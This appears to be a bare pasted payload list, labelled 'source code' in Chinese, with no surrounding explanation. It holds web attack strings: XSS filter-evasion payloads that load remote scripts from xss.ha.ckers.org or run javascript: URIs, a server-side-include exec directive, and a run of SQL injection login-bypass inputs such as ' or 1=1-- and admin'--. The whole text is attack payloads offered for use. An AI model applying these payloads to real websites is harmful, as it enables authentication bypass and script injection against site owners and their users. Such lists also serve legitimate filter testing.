源码:
<SCRIPT>function a(){alert('XSS');}</SCRIPT>
<p><" <SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT> <img alt="" src="javascript:alert('XSS')" /><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"--> <img alt="" src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" /> <SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT> <SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://xss.ha.ckers.org/a.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"> link admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a</p>